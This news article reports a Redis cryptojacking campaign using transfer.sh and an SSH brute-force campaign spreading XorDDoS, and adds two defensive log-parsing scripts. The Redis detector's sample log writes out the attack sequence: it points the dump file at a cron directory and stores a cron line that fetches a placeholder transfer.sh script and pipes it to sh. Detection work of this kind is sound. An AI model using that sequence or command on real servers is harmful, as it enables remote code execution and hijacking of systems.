By Ravie Lakshmanan, Mar 02, 2023
Misconfigured Redis database servers are the target of a novel
cryptojacking campaign that leverages a legitimate and open source
command-line file transfer service to stage and deliver its payload.
“Underpinning this campaign was the use of transfer[.]sh,” Cado
Security said[1]
in a report shared with The Hacker News. “It’s possible that it’s
an attempt at evading detections based on other common code hosting
domains (such as pastebin[.]com).”
The cloud cybersecurity firm said the command line interactivity
associated with transfer[.]sh has made it an ideal tool for hosting
and delivering malicious payloads.
The attack chain begins with insecure, internet-exposed Redis
deployments, which the attacker uses to register a cron job[2]; when
the scheduler parses that job it runs attacker-controlled commands,
giving arbitrary code execution. The job is designed to retrieve a
payload hosted at transfer[.]sh.
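The page does not spell out how a Redis client ends up registering a cron job. The widely documented route, which this added example assumes (it is not Cado's code, nor a capture from this campaign), is to repoint Redis's dump file at a cron directory with CONFIG SET dir and CONFIG SET dbfilename, store a key whose value is a cron line, and call SAVE so the RDB file lands where the scheduler reads it. The script below watches for exactly that sequence in `redis-cli MONITOR` output. The sample MONITOR lines and the transfer.sh path are constructed placeholders, and the cron directory list is an assumption to adjust per distribution.

```python
import re

# Constructed sample of `redis-cli MONITOR` output: it is not a capture from the
# campaign, and the transfer.sh path is a placeholder, not a real payload URL.
SAMPLE_MONITOR = """\
1677700001.100000 [0 10.0.0.5:51234] "CONFIG" "SET" "dir" "/var/spool/cron"
1677700001.200000 [0 10.0.0.5:51234] "CONFIG" "SET" "dbfilename" "root"
1677700001.300000 [0 10.0.0.5:51234] "SET" "x" "\\n\\n*/1 * * * * curl -fsSL https://transfer.sh/EXAMPLE/payload.sh | sh\\n\\n"
1677700001.400000 [0 10.0.0.5:51234] "SAVE"
1677700002.000000 [0 192.168.1.20:40000] "CONFIG" "SET" "dir" "/var/lib/redis"
1677700002.100000 [0 192.168.1.20:40000] "SET" "session:42" "user=alice"
1677700002.200000 [0 192.168.1.20:40000] "BGSAVE"
"""

# Directories a cron daemon reads; a Redis "dir" pointed here is the tell-tale
# step. The list is an assumption; extend it for your distribution.
CRON_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily")

_LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<addr>\S+)\] (?P<rest>.*)$')
_ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Five schedule fields followed by a command, on a line of its own.
_CRON_LINE_RE = re.compile(r'^\s*(?:\S+\s+){5}\S', re.MULTILINE)


def parse_monitor_line(line):
    """Split one MONITOR line into (timestamp, client address, [command, args...]); None if it does not parse."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    # MONITOR prints arguments quoted with C-style escapes, so "\n" arrives as a literal backslash-n.
    args = [a.encode("latin-1").decode("unicode_escape") for a in _ARG_RE.findall(m.group("rest"))]
    return float(m.group("ts")), m.group("addr"), args


def find_cron_writes(monitor_text):
    """Return one alert per SAVE/BGSAVE issued by a client that has pointed the dump file at a cron directory."""
    state = {}   # client address -> config it changed and the last cron-looking value it stored
    alerts = []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed:
            continue
        ts, addr, args = parsed
        if not args:
            continue
        st = state.setdefault(addr, {"dir": None, "dbfilename": None, "payload": None})
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                st[key] = args[3]
        elif cmd == "SET" and len(args) >= 3:
            val = args[2]
            # A value with embedded newlines and a five-field schedule is a cron line smuggled into the RDB dump.
            if "\n" in val and _CRON_LINE_RE.search(val):
                st["payload"] = val.strip()
        elif cmd in ("SAVE", "BGSAVE"):
            if st["dir"] and st["dir"].rstrip("/").startswith(CRON_DIRS):
                alerts.append({"ts": ts, "client": addr, "dir": st["dir"],
                               "dbfilename": st["dbfilename"], "payload": st["payload"]})
    return alerts


if __name__ == "__main__":
    for alert in find_cron_writes(SAMPLE_MONITOR):
        print(f"[{alert['ts']}] {alert['client']} wrote RDB dump {alert['dbfilename']!r} into {alert['dir']}")
        if alert["payload"]:
            print("  cron line:", alert["payload"])
```

Feed it `redis-cli MONITOR` output from an exposed instance, or an equivalent command log. The same state tracking is the basis for the obvious prevention: a Redis that is bound to localhost, runs with `protected-mode yes` and a password, and has `CONFIG` renamed or disabled never lets an unauthenticated client reach the SAVE step.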
It’s worth noting that similar[3]
attack mechanisms[4]
have been employed by other threat actors like TeamTNT and WatchDog
in their cryptojacking operations.
The payload is a script that paves the way for an XMRig
cryptocurrency miner, but not before taking preparatory steps to
free up memory, terminate competing miners, and install a network
scanner utility called pnscan to find vulnerable Redis servers and
propagate the infection.
“Although it is clear that the objective of this campaign is to
hijack system resources for mining cryptocurrency, infection by
this malware could have unintended effects,” the company said.
“Reckless configuration of Linux memory management systems could
quite easily result in corruption of data or the loss of system
availability.”
The development makes it the latest threat to strike Redis
servers after Redigo[5]
and HeadCrab[6]
in recent months.
The findings also come as Avertium disclosed[7]
a new set of attacks in which SSH servers are brute-forced to
deploy the XorDDoS botnet[8]
malware on compromised servers with the goal of launching
distributed denial-of-service (DDoS) attacks against targets
located in China and the U.S.
The cybersecurity company said it observed 1.2 million
unauthorized SSH connection attempts across 18 honeypots between
October 6, 2022, and December 7, 2022. It attributed the activity
to a threat actor based in China.
Some 42% of those attempts originated from 49 IP addresses assigned
to ChinaNet Jiangsu Province Network, with the rest emanating from
roughly 8,000 IP addresses scattered all over the world.
“It was found that once the scanning identified an open port, it
would be subject to a brute-force attack against the ‘root’ account
using a list of approximately 17,000 passwords,” Avertium said.
“Once the brute-force attack was successful, a XorDDoS bot was
installed.”
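The brute-force pattern Avertium describes (many failed password logins as root from one source, then a success) is easy to pull out of sshd logs. The script below is an added example, not Avertium's tooling or data: the syslog-style auth lines are constructed, the failure threshold is an arbitrary assumption, and the IP addresses are documentation ranges. It reports, per source, the failure count, the accounts targeted, whether a login was accepted after the failures (the moment a bot would be installed), and each source's share of all failures, which is the kind of breakdown behind the 42%-from-49-addresses figure above.

```python
import re

# Constructed sshd log lines in syslog format (not Avertium's honeypot data).
# 203.0.113.7 hammers root and then gets in; the other two sources are noise.
SAMPLE_AUTH_LOG = """\
Oct  6 01:02:01 honeypot sshd[1201]: Failed password for root from 203.0.113.7 port 51000 ssh2
Oct  6 01:02:02 honeypot sshd[1202]: Failed password for root from 203.0.113.7 port 51002 ssh2
Oct  6 01:02:03 honeypot sshd[1203]: Failed password for root from 203.0.113.7 port 51004 ssh2
Oct  6 01:02:04 honeypot sshd[1204]: Failed password for root from 203.0.113.7 port 51006 ssh2
Oct  6 01:02:05 honeypot sshd[1205]: Failed password for root from 203.0.113.7 port 51008 ssh2
Oct  6 01:02:06 honeypot sshd[1206]: Failed password for root from 203.0.113.7 port 51010 ssh2
Oct  6 01:02:07 honeypot sshd[1207]: Accepted password for root from 203.0.113.7 port 51012 ssh2
Oct  6 01:05:00 honeypot sshd[1300]: Failed password for invalid user admin from 198.51.100.9 port 40000 ssh2
Oct  6 01:10:00 honeypot sshd[1400]: Accepted publickey for alice from 192.0.2.5 port 50000 ssh2
"""

_SSHD_RE = re.compile(
    r'sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) for '
    r'(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)'
)


def parse_sshd_line(line):
    """Extract result, auth method, user, source IP and port from one sshd line; None if it is not an auth event."""
    m = _SSHD_RE.search(line)
    return m.groupdict() if m else None


def brute_force_report(log_text, threshold=5):
    """Per source IP with at least `threshold` failed password logins: failure count, targeted
    users, and whether a login was accepted from that IP after the failures."""
    per_ip = {}
    for line in log_text.splitlines():
        ev = parse_sshd_line(line)
        if ev is None:
            continue
        st = per_ip.setdefault(ev["ip"], {"failed": 0, "users": set(), "accepted_after_failures": False})
        if ev["result"] == "Failed" and ev["method"] == "password":
            st["failed"] += 1
            st["users"].add(ev["user"])
        elif ev["result"] == "Accepted" and st["failed"] >= threshold:
            # Success only after a run of failures is the signature of a guessed password.
            st["accepted_after_failures"] = True
    return {ip: st for ip, st in per_ip.items() if st["failed"] >= threshold}


def failure_share(log_text):
    """(ip, failed count, fraction of all failures) per source, largest contributor first."""
    counts = {}
    for line in log_text.splitlines():
        ev = parse_sshd_line(line)
        if ev and ev["result"] == "Failed" and ev["method"] == "password":
            counts[ev["ip"]] = counts.get(ev["ip"], 0) + 1
    total = sum(counts.values())
    if not total:
        return []
    return sorted(((ip, n, n / total) for ip, n in counts.items()), key=lambda t: -t[1])


if __name__ == "__main__":
    for ip, st in brute_force_report(SAMPLE_AUTH_LOG).items():
        flag = "login accepted after failures" if st["accepted_after_failures"] else "no success seen"
        print(f"{ip}: {st['failed']} failed password attempts against {sorted(st['users'])} ({flag})")
    for ip, n, share in failure_share(SAMPLE_AUTH_LOG):
        print(f"{ip}: {n} failures, {share:.0%} of total")
```

Run it over `/var/log/auth.log` or `journalctl -u ssh` output. A hit with `accepted_after_failures` set is an incident, not a tuning problem. The configuration that removes this attack class is `PermitRootLogin no` and `PasswordAuthentication no` in sshd_config, so that a 17,000-entry password list has nothing to guess against.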
References
[1] said (www.cadosecurity.com)
[2] cron job (en.wikipedia.org)
[3] similar (unit42.paloaltonetworks.com)
[4] attack mechanisms (www.cadosecurity.com)
[5] Redigo (thehackernews.com)
[6] HeadCrab (thehackernews.com)
[7] disclosed (www.avertium.com)
[8] XorDDoS botnet (thehackernews.com)
Read more https://thehackernews.com/2023/03/new-cryptojacking-campaign-leverages.html
